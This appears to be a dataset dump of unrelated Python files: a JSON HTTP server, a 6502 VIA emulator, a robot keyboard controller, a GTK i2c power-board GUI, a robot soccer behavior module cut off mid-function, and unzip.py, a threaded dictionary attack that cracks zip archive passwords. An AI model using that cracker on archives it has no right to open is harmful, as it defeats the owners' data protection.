source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
server.py
|
# -*- coding: utf-8 -*-
import json
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class JsonHandler(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
return
# переопределяю логирование
def log_message(self, format, *args):
return
def do_GET(self):
self._set_headers()
# processing request
return
def do_HEAD(self):
self._set_headers()
return
@staticmethod
def check_json(request):
try:
json.loads(request)
except ValueError:
return False
return True
def do_POST(self):
self._set_headers()
content_len = int(self.headers.getheader('Content-Length', 0))
body = self.rfile.read(content_len)
# проверяем json на валидность
check = self.check_json(body)
# processing request
# for write use:
# self.wfile.write('{"ok" : "ok"}')
return
class MultiThreadHTTPServer(HTTPServer):
def process_request(self, request, client_address):
thread = Thread(target=self.__new_request, args=(self.RequestHandlerClass, request, client_address, self))
thread.start()
def __new_request(self, handlerclass, request, address, server):
handlerclass(request, address, server)
self.shutdown_request(request)
class HttpGate():
@staticmethod
def http_gate():
httpd = MultiThreadHTTPServer(('', 20756), JsonHandler)
httpd.serve_forever()
HttpGate().http_gate()
|
via65c02.py
|
import sys
import time
import threading
from utils import console
class VIA():
SR = 4
SET_CLEAR = 128
def __init__(self, start_addr, mpu):
self.mpu = mpu
self.VIA_SR = start_addr + 0x0a # shift register
self.VIA_IFR = start_addr + 0x0d # interrupt flags register
self.VIA_IER = start_addr + 0x0e # interrupt enable register
self.SRThread = False
self.escape = False
self.quit = False
self.dbFlag = False
self.name = 'VIA'
# init
self.reset()
self.install_interrupts()
def check_debug(self, flag=None):
if flag != None:
self.dbFlag = flag
return self.dbFlag
def install_interrupts(self):
def getc(address):
char = console.getch_noblock(sys.stdin)
if char:
byte = ord(char)
if self.escape:
self.escape = False
if byte == 0x51 or byte == 0x71: # handles <ESC>Q or <ESC>q
byte = 0
self.quit = True
elif byte == 0x44 or byte == 0x64: # handles <ESC>D or <ESC>d
byte = 0
self.dbFlag = True
else:
if byte == 0x1b:
self.escape = True
byte = 0
else:
self.mpu.memory[self.VIA_IFR] &= 0xfb
else:
byte = 0
return byte
def SR_enable(address, value):
if value & self.SET_CLEAR:
# enable interrupts
if value & self.SR and not self.SRThread:
t = threading.Thread(target=SR_thread, daemon = True)
self.SRThread = True
t.start()
else:
# disable interrupts
if value & self.SR and self.SRThread:
self.SRThread = False
def SR_thread():
while(self.SRThread):
time.sleep(.05) # delay needed to allow processing of interrupt prior to setting it again *** TODO: would be nice to eliminate this with a flag or something ***
if (self.mpu.p & self.mpu.INTERRUPT == 0) and self.mpu.IRQ_pin:
if console.kbhit():
self.mpu.memory[self.VIA_IFR] |= 0x04
self.mpu.IRQ_pin = 0
count_irq = 0 # we need a short delay here
while count_irq < 100:
count_irq += 1
self.mpu.memory.subscribe_to_write([self.VIA_IER], SR_enable)
self.mpu.memory.subscribe_to_read([self.VIA_SR], getc)
def reset(self):
self.mpu.memory[self.VIA_IER] = 0
self.mpu.memory[self.VIA_IFR] = 0
#def irq(self):
#return (IFR6 and IER6) or (IFR5 and IER5) or (IFR4 and IER4) or (IFR3 and IER3) or (IFR2 and IER2) or (IFR1 and IER1) or (IFR0 and IER0)
#return (self.mpu.memory[self.VIA_IFR] and self.SR) and ((self.mpu.memory[self.VIA_IER] and self.SR))
|
consoleControl.py
|
#!/usr/bin/python
import socket
import numpy as np
import sys
import signal
import time
import threading
from threading import Thread
import curses
from curses import wrapper
from curses import ascii
"""
@brief Keyboard control for the QuickBot.
@description This program is used to drive the QuickBot via the keyboard
@author Rowland O'Flaherty (rowlandoflaherty.com)
@author Marty Kube marty@beavercreekconsulting.com
@date 2015-04-20
@note Works with 64-bit python
@version: 1.0
@copyright: Copyright (C) 2014, Georgia Tech Research Corporation see
the LICENSE file included with this software (see LINENSE file)
"""
# Constants
LEFT = 0
RIGHT = 1
FORWARD = 1
BACKWARD = -1
SEND_FLAG = True
# Get input arguments
LOCAL_IP = "192.168.2.1" # Computer IP address (change to correct value)
QB_IP = "192.168.1.160" # QuickBot IP address (change to correct value)
PORT = 5005
if len(sys.argv) > 2:
print('Invalid number of command line arguments.')
print('Usage:')
print('>> consoleControl.py <robot-ip>')
print('Example:')
print('>> consoleControl.py ', QB_IP)
sys.exit()
if len(sys.argv) == 2:
QB_IP = sys.argv[1]
class QuickBot:
# Parameters -- (LEFT, RIGHT)
pwmMinVal = [35, 35]
pwmMaxVal = [100, 100]
# State -- (LEFT, RIGHT)
pwm = [0.0, 0.0]
pwmDelta = [2, 2]
def __init__(self, socket):
self.socket = socket
# last command sent
self.cmdStr = ''
def send(self):
self.socket.sendto(self.cmdStr, (QB_IP, PORT))
def receive(self):
return self.socket.recv(2048)
def stop(self):
self.pwm = [0, 0]
def update(self):
# Slow down
slowDownRate = 2
for side in range(0, 2):
if self.pwm[side] > 0:
self.accelerateByVal(-1*slowDownRate, side)
elif self.pwm[side] < 0:
self.accelerateByVal(slowDownRate, side)
def accelerate(self, dir, side):
self.accelerateByVal(dir*self.pwmDelta[side], side)
def accelerateByVal(self, val, side):
way = np.sign(val)
if self.pwm[side] == 0:
self.pwm[side] = way*self.pwmMinVal[side]
elif (self.pwm[side] == self.pwmMinVal[side] and way < 0) or (
self.pwm[side] == -1*self.pwmMinVal[side] and way > 0):
self.pwm[side] = 0
else:
self.pwm[side] = self.pwm[side] + val
if self.pwm[side] > 0:
self.pwm[side] = min(self.pwm[side], self.pwmMaxVal[side])
elif self.pwm[side] < 0:
self.pwm[side] = max(self.pwm[side], -1*self.pwmMaxVal[side])
def setPWM(self):
self.cmdStr = "$PWM=" + str(QB.pwm[LEFT]) + "," + \
str(QB.pwm[RIGHT]) + "*\n"
self.send()
def getIR(self):
self.cmdStr = "$IRVAL?*\n"
self.send()
def getEncoderVal(self):
self.cmdStr = "$ENVAL?*\n"
self.send()
def resetEncoder(self):
self.cmdStr = "$RESET*\n"
self.send()
def healthCheck(self):
self.cmdStr = "$CHECK*\n"
self.send()
def calibrate(self):
self.pwm[LEFT] = 90
self.pwm[RIGHT] = 80
self.setPWM()
def end(self):
self.cmdStr = "$END*\n"
self.send()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
print('Binding to %s %d' % (LOCAL_IP, PORT));
sock.bind((LOCAL_IP, PORT))
QB = QuickBot(sock)
class Console:
"""
Class to interact with screen
"""
TITLE_ROW = 0
SENT_ROW = 1
RECEIVE_ROW = 2
PROMPT_ROW = 3
def __init__(self):
self.sentMsg = ''
self.receivedMsg = ''
self.promptMsg = ''
self.screen = None
def sent(self, msg = ''):
self.sentMsg = msg
self.paint()
def received(self, msg):
self.receivedMsg = msg
self.paint()
def prompt(self, msg = ' '):
self.promptMsg = msg
self.paint()
def paint(self):
if self.screen != None:
self.screen.addstr(self.TITLE_ROW, 0, ' ' * curses.COLS, curses.A_REVERSE)
self.screen.addstr( self.TITLE_ROW, 0, 'Quickbot Control', curses.A_REVERSE)
self.screen.addstr(self.SENT_ROW, 0, 'Sent : ')
self.screen.addstr(self.sentMsg)
self.screen.addstr(self.RECEIVE_ROW, 0, 'Received: ')
self.screen.addstr(self.receivedMsg)
self.screen.addstr(curses.LINES - 3, 0, ' ' * curses.COLS, curses.A_REVERSE)
self.screen.addstr(curses.LINES - 3, 0, 'Forward/Backward: up/down arrow, Left/Right: left/righ arrow, Stop: space', curses.A_REVERSE)
self.screen.addstr(curses.LINES - 2, 0, ' ' * curses.COLS, curses.A_REVERSE)
self.screen.addstr(curses.LINES - 2, 0, 'Left Wheel: a/z, Right Wheel: s/x', curses.A_REVERSE)
self.screen.move(curses.LINES - 1, 0)
self.screen.addstr(' ' * (curses.COLS - 1), curses.A_REVERSE)
self.screen.addstr(curses.LINES - 1, 0, 'Quit: q, Encoder: e, IR: r, Reset Encoder: t, Check Status: c', curses.A_REVERSE)
self.screen.addstr(curses.LINES - 4, 0, '> ')
self.screen.addstr(self.promptMsg)
self.screen.refresh()
def run(self, screen):
self.screen = screen
self.paint()
while True:
c = screen.getch()
if curses.ascii.islower(c):
self.prompt(chr(c))
# End program
if c == curses.ascii.ESC:
break
if c == ord('q'):
break
# Stop robot
if c == curses.ascii.SP:
QB.stop()
QB.setPWM()
# Move right wheel
elif c == ord('s'):
QB.accelerate(FORWARD, LEFT)
QB.setPWM()
elif c == ord('x'):
QB.accelerate(BACKWARD, LEFT)
QB.setPWM()
# Move left wheel
elif c == ord('a'):
QB.accelerate(FORWARD, RIGHT)
QB.setPWM()
elif c == ord('z'):
QB.accelerate(BACKWARD, RIGHT)
QB.setPWM()
# Move forward/backward
elif c == curses.KEY_UP:
QB.accelerate(FORWARD, LEFT)
QB.accelerate(FORWARD, RIGHT)
QB.setPWM()
elif c == curses.KEY_DOWN:
QB.accelerate(BACKWARD, LEFT)
QB.accelerate(BACKWARD, RIGHT)
QB.setPWM()
# Turn left/right
elif c == curses.KEY_RIGHT:
QB.accelerate(BACKWARD, LEFT)
QB.accelerate(FORWARD, RIGHT)
QB.setPWM()
elif c == curses.KEY_LEFT:
QB.accelerate(FORWARD, LEFT)
QB.accelerate(BACKWARD, RIGHT)
QB.setPWM()
# Encoder query
elif c == ord('e'):
QB.getEncoderVal()
# Encoder reset
elif c == ord('t'):
QB.resetEncoder()
# IR query
elif c == ord('r'):
QB.getIR()
# Health Check
elif c == ord('c'):
QB.healthCheck()
# Calibrate motor
elif c == ord('m'):
QB.calibrate()
# Don't know this character
else:
self.prompt()
# Update display for last command
self.sent(QB.cmdStr)
console = Console()
def poll():
count = 1
while True:
try:
data = sock.recv(2048)
console.received(data)
except socket.error as mesg:
pass
time.sleep(0.1)
def main(screen):
t = threading.Thread(target=poll)
t.setDaemon(True)
t.start()
console.run(screen)
wrapper(main)
|
gui2.py
|
import gi
import smbus2
import CSPB
import os.path
import time
import threading
import queue
from datetime import datetime
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GLib, Gdk
class gui2:
"""
A class to generate a graphical user interface and provide i2c
communications with the cluster system power board. This class handles the
callback function generated by the glade layout manager.
Attributes
----------
None
Methods
-------
set_power(value):
Sends the power command value to the cluster system power board.
do_destroy_window(self, widget, data=None):
do_i2c_device_address_changed
do_rescan_button_clicked
do_send_clicked
do_read_registers_clicked
do_register_write_enable
do_write_register_clicked
do_IOError_close_clicked
populate_bus_num
populate_device_num
init_cspb_command_type_group
set_widget_references
get_device_on_bus
update_power_display
set_power_indicator_text
update_progress
show_busy_cursor
get_register_data
update_register_display
process_shutdown_commands
get_cspb
rescan_i2c_bus
get_available_i2c_bus_numbers
clear_power_indicators
clear_slot_command_selection
clear_register_display
do_io_error_dialog_destroy
"""
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("Test2.glade")
self.builder.connect_signals(self)
self.set_widget_references()
self.populate_bus_num(self.get_available_i2c_bus_numbers())
self.populate_device_num(self.get_device_on_bus(int(self.bus_combobox.get_active_text())))
self.init_cspb_command_type_group()
self.gui = self.builder.get_object("CSPB Command Window")
self.gtk_box = self.builder.get_object("gtk_box")
self.gui.show()
def main(self):
Gtk.main()
def do_destroy_window(self, widget, data=None):
print("destroy_window()")
Gtk.main_quit()
def do_i2c_device_address_changed(self, widget, data=None):
print("do_i2c_device_address_changed()")
self.update_power_display()
def do_rescan_button_clicked(self, widget, data=None):
print("do_rescan_button_clicked()")
self.clear_power_indicators()
self.clear_slot_command_selection()
self.rescan_i2c_bus()
def do_send_clicked(self, widget, data=None):
print("do_send_clicked()")
command_set = 0; # decimal value representing the slots selected.
number_of_slots_selected = 0
for slot in range (1, 5):
command = "slot_command_"
command += str(slot)
slot_command = self.builder.get_object(command)
slot_command_value = int(slot_command.get_active())
if (slot_command_value == 1):
number_of_slots_selected += 1
self.set_power_indicator_text(slot-1, " ")
shift_command = slot_command_value << slot-1
command_set = command_set + shift_command
try:
cspb = self.get_cspb()
time.sleep(.01)
except Exception as e:
print("do_send_clicked(): input error! ", e)
return
# Determine which command to send to the CSPB.
if (self.rb_shutdown.get_active() == True):
if (number_of_slots_selected == 0):
return
shutdown_timeout = cspb.read_register(CSPB.CSPB.SHTDWN_TIME_OUT_RGSTR_ADDR) # already in seconds.
power_down_hold_delay = (cspb.read_register(CSPB.CSPB.PWR_DWN_SGNL_DRTN_RGSTR_ADDR)*20)/1000 # convert from miliseconds to seconds.
max_trys = number_of_slots_selected*(shutdown_timeout + power_down_hold_delay)+1
print("Max trys ", max_trys, "command_set: ", str(command_set))
cspb.shutdown(command_set)
time.sleep(.1)
work_thread = threading.Thread(target=self.process_shutdown_commands, args=(cspb, max_trys))
work_thread.start()
elif (self.rb_signal_only.get_active() == True):
if (number_of_slots_selected == 0):
return
cspb.signal_shutdown(command_set)
elif (self.rb_power.get_active() == True):
cspb.set_power(command_set)
time.sleep(.1)
self.update_power_display()
def do_read_registers_clicked(self, widget, data=None):
print("do_read_registers_clicked()")
bus_id = int(self.bus_combobox.get_active_text())
i2c_addr = int(self.addr_combobox.get_active_text())
self.data_queue = queue.Queue()
work_thread = threading.Thread(target=self.get_register_data, args=(bus_id, i2c_addr, self.data_queue))
work_thread.start()
def do_register_write_enable(self, widget, data=None):
print("do_register_write_enable()", widget.get_name())
if (widget.get_name() == "enable_0"):
self.enable_box = self.builder.get_object('register_write_enable_0')
self.input_box = self.builder.get_object('register_address_input_0')
elif (widget.get_name() == "enable_1"):
self.enable_box = self.builder.get_object('register_write_enable_1')
self.input_box = self.builder.get_object('register_address_input_1')
elif (widget.get_name() == "enable_2"):
self.enable_box = self.builder.get_object('register_write_enable_2')
self.input_box = self.builder.get_object('register_address_input_2')
elif (widget.get_name() == "enable_3"):
self.enable_box = self.builder.get_object('register_write_enable_3')
self.input_box = self.builder.get_object('register_address_input_3')
elif (widget.get_name() == "enable_4"):
self.enable_box = self.builder.get_object('register_write_enable_4')
self.input_box = self.builder.get_object('register_address_input_4')
elif (widget.get_name() == "enable_5"):
self.enable_box = self.builder.get_object('register_write_enable_5')
self.input_box = self.builder.get_object('register_address_input_5')
if self.enable_box.get_active():
self.input_box.set_visible(True)
else:
self.input_box.set_visible(False)
def do_write_register_clicked(self, widget, data=None):
print("do_write_register_clicked()")
try:
cspb = self.get_cspb()
except Exception as e:
print("do_write_register_clicked(): ", e)
return
write_enable_prefix = "register_write_enable_"
input_box_prefix = "register_address_input_"
for register in range (0, 6):
write_enable_ID = write_enable_prefix +str(register)
write_enable_object = self.builder.get_object(write_enable_ID)
if write_enable_object.get_active():
input_box_ID = input_box_prefix +str(register)
print("input box id: ", input_box_ID, "register: ", register)
input_box_object = self.builder.get_object(input_box_ID)
input_buffer = input_box_object.get_buffer()
cspb.write_register(register, int(input_buffer.get_text()))
time.sleep(.1) # allow bus to clear before next command.
self.do_read_registers_clicked(widget, data=None)
def do_IOError_close_clicked(self, widget, data=None):
print("do_IOError_close_clicked")
self.io_error_dialog.hide();
def populate_bus_num(self, list_store):
print("populate_bus_num()")
combobox = self.builder.get_object('Bus_Number_Combobox')
combobox.set_model(list_store)
combobox.set_active(0)
def populate_device_num(self, list_store):
print("populate_device_num()")
self.addr_combobox.set_model(list_store)
self.addr_combobox.set_active_id(None)
GLib.idle_add(self.show_busy_cursor, False)
def init_cspb_command_type_group(self):
self.rb_shutdown.set_active(True)
def set_widget_references(self):
self.rb_shutdown = self.builder.get_object('command_type_shutdown')
self.rb_signal_only = self.builder.get_object('command_type_shutdown_signal_only')
self.rb_power = self.builder.get_object('command_type_power')
self.bus_combobox = self.builder.get_object('Bus_Number_Combobox')
self.addr_combobox = self.builder.get_object('Device_Addr_Combobox')
self.progress_bar = self.builder.get_object('progress_bar')
self.progress_bar.set_size_request(100,30)
self.io_error_dialog = self.builder.get_object('register_IO_error_dialog')
def get_device_on_bus(self, busNum):
devices = Gtk.ListStore(str)
try:
bus = smbus2.SMBus(busNum)
for addr in range (8, 178):
GLib.idle_add(self.update_progress, (addr+1)/178)
try:
bus.write_quick(addr)
devices.append([str(addr)])
except IOError:
pass
except:
pass
GLib.idle_add(self.update_progress, 0)
return devices
def update_power_display(self):
print("update_power_display()")
for nuber_of_trys in range (0, 3): # make 3 attempts to get power data.
try:
cspb = self.get_cspb()
power_state = cspb.read_register(CSPB.CSPB.PWR_STTS_RGSTR_ADDR)
print("power state ", str(power_state))
for indicator_num in range (0,4):
if (power_state & (1 << indicator_num) >= 1):
self.set_power_indicator_text(indicator_num, "On")
else:
self.set_power_indicator_text(indicator_num, "Off")
return
except Exception as e:
print("display error", e)
time.sleep(.5) # delay before trying again.
def set_power_indicator_text(self, indicator_num, text):
print("set_power_indicator_text()")
display_name = "power_indicator_" +str(indicator_num)
display_object = self.builder.get_object(display_name)
display_object.set_label(text)
def update_progress(self, fraction):
print("update_progress()")
self.progress_bar.set_fraction(fraction)
return False
def show_busy_cursor(self, visable):
print("show_busy_cursor()")
if (visable == True):
self.gui.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.WATCH))
else:
self.gui.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def get_register_data(self, bus_id, i2c_addr, data_queue):
print("get_register_data()")
GLib.idle_add(self.show_busy_cursor, True)
GLib.idle_add(self.clear_register_display)
try:
cspb = self.get_cspb()
number_of_registers_to_retreive = 6 # The frist 6 registers are user programable.
for register_num in range (0,number_of_registers_to_retreive):
data_queue.put(cspb.read_register(register_num))
GLib.idle_add(self.update_progress, (register_num+1)/number_of_registers_to_retreive)
time.sleep(.1) # Give i2c bus time to stablize.
except Exception as e:
print("get_register_data() error: ", e)
GLib.idle_add(self.update_progress, 0)
GLib.idle_add(self.show_busy_cursor, False)
GLib.idle_add(self.io_error_dialog.show)
# TODO - Popup an error message.
return
GLib.idle_add(self.update_progress, 0)
GLib.idle_add(self.update_register_display, data_queue)
GLib.idle_add(self.show_busy_cursor, False)
return
def update_register_display(self, data_queue):
print("update_register_display()")
display_name_prefix = "register_value_display"
number_of_registers = 6 # The frist 6 registers are user programable.
for register_num in range (0,number_of_registers):
display_name = display_name_prefix + str(register_num)
display_object = self.builder.get_object(display_name)
display_buffer = display_object.get_buffer()
display_buffer.set_text(str(self.data_queue.get()))
return False
def process_shutdown_commands(self, cspb, max_trys):
print("process_shutdown_commands()")
in_shutdown = True
attempts = 0
GLib.idle_add(self.show_busy_cursor, (True))
while (in_shutdown == True):
print("get is_shutting_down", str(datetime.now()))
attempts += 1
print("attempts ", str(attempts))
GLib.idle_add(self.update_progress, (attempts/max_trys))
if (attempts > max_trys):
print("Max trys reached")
in_shutdown = False
try:
is_shutting_down = cspb.read_register(CSPB.CSPB.IN_SHUTDOWN_RGSTR_ADDR) # any read command will do
if (is_shutting_down):
pass # just wait
else:
in_shutdown = False
except IOError:
print("IOError")
print("in_shutdown = ", in_shutdown)
time.sleep(1)
GLib.idle_add(self.update_progress, 0)
GLib.idle_add(self.update_power_display)
GLib.idle_add(self.show_busy_cursor, (False))
def get_cspb(self):
print("get_cspb()")
bus_combobox = self.builder.get_object('Bus_Number_Combobox')
bus_number = int(bus_combobox.get_active_text())
addr_combobox = self.builder.get_object('Device_Addr_Combobox')
i2c_address = int(addr_combobox.get_active_text())
cspb = CSPB.CSPB(bus_number, i2c_address)
return cspb
def rescan_i2c_bus(self):
print("rescan_i2c_bus()")
GLib.idle_add(self.show_busy_cursor, True)
self.populate_bus_num(self.get_available_i2c_bus_numbers())
self.populate_device_num(self.get_device_on_bus(int(self.bus_combobox.get_active_text())))
def get_available_i2c_bus_numbers(self):
print("get_available_i2c_bus_numbers()")
store = Gtk.ListStore(str)
for i2c_num in range (0, 10):
file_path = "/dev/i2c-"
file_path += str(i2c_num)
if os.path.exists(file_path):
store.append([str(i2c_num)])
return store
def clear_power_indicators(self):
print("clear_power_indicators()")
for indicator_num in range (0,4):
self.set_power_indicator_text(indicator_num, " ")
def clear_slot_command_selection(self):
print("clear_slot_command_selection()")
for slot in range (1, 5):
command = "slot_command_"
command += str(slot)
slot_command = self.builder.get_object(command)
slot_command.set_active(False)
def clear_register_display(self):
print("clear_register_display()")
display_name_prefix = "register_value_display"
number_of_registers = 6 # The frist 6 registers are user programable.
for register_num in range (0,number_of_registers):
display_name = display_name_prefix + str(register_num)
display_object = self.builder.get_object(display_name)
display_buffer = display_object.get_buffer()
display_buffer.set_text("")
return False
def do_io_error_dialog_destroy(self, widget, data=None):
print("do_io_error_dialog_destroy()")
self.io_error_dialog.hide()
return True # Prevent dialog from being destroyed.
if __name__ == '__main__':
app = gui2()
app.main()
|
unzip.py
|
# _*_coding:utf8-
import zipfile
import optparse
from threading import Thread
def extractFile(zFile,password):
'''
:param zFile: it's function in Python
:param password: password in password.txt,and try use it to extract with zip file
:return: None
'''
try:
zFile.extractall(pwd=password)
print '[+] Found password:' + password + '\n'
except :
pass
def main():
'''
this code we need know what is threading?
And what is optparse,if you don't know,don't worry about it, we will
explain in the next Chapter.
Expansion:
--------
the optparse is like "argparse" in python
what is exit(0) ?
https://blog.csdn.net/geekleee/article/details/52794826
'''
parser = optparse.OptionParser('usage%prog' + '-f <zipfile> -d <dictionary>')
parser.add_option('-f',dest = 'zname',type='string',
help = 'specify zip file')
parser.add_option('-d',dest = 'dname',type='string',
help = 'specify dictionary file')
(options,args) = parser.parse_args()
if (options.zname == None) or (options.dname == None):
print parser.usage
exit(0)
else:
zname = options.zname
dname = options.dname
zFile = zipfile.ZipFile(zname)
passFile = open(dname)
for line in passFile.readlines():
password = line.strip('\n')
t = Thread(target=extractFile,args=(zFile,password))
t.start()
print Thread.getName(t) + 'is start'
if __name__ == '__main__':
main()
|
behavior.py
|
from itertools import izip
from threading import Thread, Lock
import time
import math
from enum import Enum
from localization import RobotPose
from camera_geometry import CamGeom
from threadsafe import ThreadSafe
from walker import Walker, OdoListener
class Stance(Enum):
FACE_DOWN = 0
FACE_UP = 1
RIGHT_SHOULDER_UP = 2
LEFT_SHOULDER_UP = 3
STAND = 4
class StanceDeterminator:
_switcher = (
lambda v: Stance.FACE_DOWN if v > 0.0 else Stance.FACE_UP,
lambda v: Stance.LEFT_SHOULDER_UP if v > 0.0 else Stance.RIGHT_SHOULDER_UP,
lambda v: Stance.STAND,
)
def __init__(self, robot):
self.robot = robot
def determinate(self):
data = self.robot.accelerometer.acceleration()['data']
index, val = max(enumerate(data), key=lambda x: abs(x[1]))
return self._switcher[index](val)
class Behavior:
def run(self):
pass
def reset(self):
pass
def is_done(self):
return True
def stop(self):
pass
class UnknownBehavior(Behavior):
def run(self):
pass
# print "Warning: Unknown behavior!"
class SwitcherBasedBehavior(Behavior):
def __init__(self, robot, pose_handler, pose_switcher, stance_determinator, walker):
self.robot = robot
self.pose_handler = pose_handler
self.pose_switcher = pose_switcher
self.stance_determinator = stance_determinator
self.walker = walker
self._finished = False
self._play = False
def prepare(self):
pass
def get_instances(self):
raise NotImplementedError
def finalize(self):
pass
def reset(self):
self.pose_switcher.stop()
self._finished = False
self._play = False
def run(self):
if not self._finished and self._play:
self.walker.stop()
self.prepare()
self.robot.joints.hardness(0.9)
switch = self.get_instances()
if switch:
aa = self.robot.locomotion.autoapply.enable()
self.robot.locomotion.autoapply.enable(False)
self.pose_switcher.switch_to(*switch)
self.robot.locomotion.autoapply.enable(aa)
self.finalize()
self._finished = True
def start(self):
self._play = True
def is_done(self):
return self._finished
def stop(self):
self.pose_switcher.stop()
self._finished = True
self._play = False
class StandingUpBehavior(SwitcherBasedBehavior):
def prepare(self):
self.robot.joints.hardness(0.0)
self.state = self.stance_determinator.determinate()
time.sleep(1.0)
counter = 10
while all(self.state != st for st in (Stance.FACE_DOWN, Stance.FACE_UP)) and counter > 0:
time.sleep(1.0)
self.state = self.stance_determinator.determinate()
counter -= 1
if counter <= 0:
self.stop()
self.robot.joints.hardness(0.85)
def get_instances(self):
if self.state == Stance.FACE_DOWN:
return "face_floor", "walking_pose"
elif self.state == Stance.FACE_UP:
return "face_up_init", "walking_pose"
def finalize(self):
self.robot.joints.hardness(0.8)
self.stop()
class KickBehavior(SwitcherBasedBehavior):
_left_leg = True
def prepare(self):
self.robot.joints.hardness(0.8)
def set_left_leg(self, left=True):
self._left_leg = left
def get_instances(self):
return "prepare_left_kick" if self._left_leg else "prepare_right_kick", "walking_pose"
def finalize(self):
time.sleep(1.0)
class WalkBehavior(Behavior):
STOP = 0
SMART_GO_TO = 1
LINEAR_GO_TO = 2
GO_AROUND = 3
def __init__(self, walker):
self._state = WalkBehavior.STOP
self._applied = False
self._walker = walker
self._args = None
self._lock = Lock()
def run(self):
if not self._applied:
with self._lock:
(
lambda: self._walker.stop(),
lambda: self._walker.smart_go_to(*self._args),
lambda: self._walker.linear_go_to(*self._args),
lambda: self._walker.go_around(*self._args)
)[self._state]()
self._applied = True
def smart_go_to(self, x, y, speed):
self._upd_args(WalkBehavior.SMART_GO_TO, x, y, speed)
def go_around(self, angle, scale=1.0):
self._upd_args(WalkBehavior.GO_AROUND, angle, scale)
def linear_go_to(self, x, y, theta):
self._upd_args(WalkBehavior.LINEAR_GO_TO, x, y, theta)
def _upd_args(self, state, *args):
with self._lock:
if self._walker.is_done() or self._state != state or self._args != args:
self._applied = False
self._state = state
self._args = args
def stop(self):
self._state = WalkBehavior.STOP
self._applied = True
self._walker.stop()
def is_done(self):
return self._walker.is_done()
class BehaviorHandler(OdoListener):
FINDING_SECTOR_ANGLE = math.radians(60.0)
HEAD_PITCH_STEP = math.radians(30.0)
HEAD_YAW_STEP = math.radians(15.0)
SLEEP_TIME = 0.01
def __init__(self, robot, walker, pose_handler, pose_switcher, cam, localization):
self.fall_indicator_count = 3
self._robot = robot
self._walker = walker
self._cam = cam
self._localization = localization
self._pose_handler = pose_handler
self._pose_switcher = pose_switcher
self._stance_determinator = StanceDeterminator(robot)
self._iterrupt = False
self._behavior = UnknownBehavior()
self._lock = Lock()
self._worker = Thread(target=BehaviorHandler.__worker, args=(self,))
self._worker.start()
self.odo = RobotPose(0.0, 0.0, 0.0)
def notify(self, frodo):
self.odo.odoTranslate(frodo[0], frodo[1], frodo[2])
def __worker(self):
self._lock.acquire()
try:
while not self._iterrupt:
behavior = self._behavior
self._lock.release()
try:
behavior.run()
time.sleep(self.SLEEP_TIME)
finally:
self._lock.acquire()
finally:
self._lock.release()
def __set_behavior(self, behavior, *args, **kwargs):
with self._lock:
if not isinstance(self._behavior, behavior):
self._behavior.stop()
self._behavior = behavior(*args, **kwargs)
def run(self):
counter = 0
start = time.time()
left_leg = True
self.__set_behavior(UnknownBehavior)
stance = self._stance_determinator.determinate()
if stance == Stance.STAND:
self._pose_handler.set_pose("walking_pose", 2.0)
timer = 0
ball_found = False
ball = {
"x": 0,
"y": 0,
"width": 0,
"height": 0,
}
timestamp = 0
pix = [0.0, 0.0]
reached = False
dode = 0
fff = False
initialized = False
tuc = None
print "Behavior was started"
while not self._iterrupt:
stance = self._stance_determinator.determinate()
counter = counter + 1 if stance != Stance.STAND else 0
if counter >= self.fall_indicator_count:
dode = 0
self.__set_behavior(StandingUpBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
if self._behavior.is_done():
self._behavior.reset()
self._behavior.start()
timer = timer + 1
time.sleep(self.SLEEP_TIME)
continue
if any(isinstance(self._behavior, behavior) for behavior in (StandingUpBehavior, KickBehavior,)):
if not self._behavior.is_done():
timer = timer + 1
time.sleep(self.SLEEP_TIME)
continue
else:
if isinstance(self._behavior, StandingUpBehavior):
self._localization.localization(True)
self.__set_behavior(UnknownBehavior)
if timestamp + 24 < timer or pix == [0.0, 0.0, 0.0]:
reached = False
self._robot.vision.updateFrame()
ball = self._robot.vision.ballDetect()
ball_found = (ball["width"] != 0.0)
if ball_found:
timestamp = timer
pix = self._cam.imagePixelToWorld(ball["x"] + ball["width"]/2, ball["y"], False)
# dode = False
# if not initialized:
# print "go to start"
# if tuc is None or math.hypot(tuc[0], tuc[1]) > 100:
# tuc = self._localization.global_to_local(self._localization.map.start_point.x, self._localization.map.start_point.y)
# self.__set_behavior(WalkBehavior, self._walker)
# self._behavior.smart_go_to(tuc[0], tuc[1], 100)
# self._walker.look_at(500.0, 0.0, 0.0)
# time.sleep(2.0)
# timer += 1
# continue
# else:
# initialized = True
if ball_found:
print "FOUND!!!!!!"
if reached or dode > 0:
fff = False
bdone = self._behavior.is_done()
if ball_found:
if pix[0] > 0.0:
self._walker.look_at(pix[0], pix[1])
if dode == 0:
enemy_point = self._localization.map.enemy_point
gates = self._localization.global_to_local(enemy_point.x, enemy_point.y)
self.__set_behavior(WalkBehavior, self._walker)
if gates[2] > math.radians(30):
self._behavior.go_around(gates[2])
dode = 1
bdone = False
time.sleep(0.2)
else:
dode = 1
bdone = True
if dode == 1 and bdone:
self.__set_behavior(KickBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
self._behavior.set_left_leg(pix[1] > 0)
aa = self._robot.locomotion.autoapply.enable(False)
self._behavior.start()
dode = 2
bdone = False
time.sleep(0.2)
if dode == 2 and bdone:
dode = 0
time.sleep(0.5)
if dode == 0:
if timestamp == 0 or timestamp + 54 < timer or pix == [0.0, 0.0, 0.0] or pix[0] < 0.0:
self.__set_behavior(WalkBehavior, self._walker)
if not ball_found:
if fff == False:
h_angle = 0.0
low = True
to_left = True
fff = True
print "h_angle", math.degrees(h_angle), to_left, low,
if to_left:
if h_angle == -self.FINDING_SECTOR_ANGLE / 2.0:
low = True
to_left = False
h_angle += self.HEAD_YAW_STEP
else:
h_angle -= self.HEAD_YAW_STEP
else:
if h_angle == self.FINDING_SECTOR_ANGLE / 2.0:
low = False
to_left = True
h_angle -= self.HEAD_YAW_STEP
else:
h_angle += self.HEAD_YAW_STEP
h_y = 0.0
h_x = 300.0 if low else 1000.0
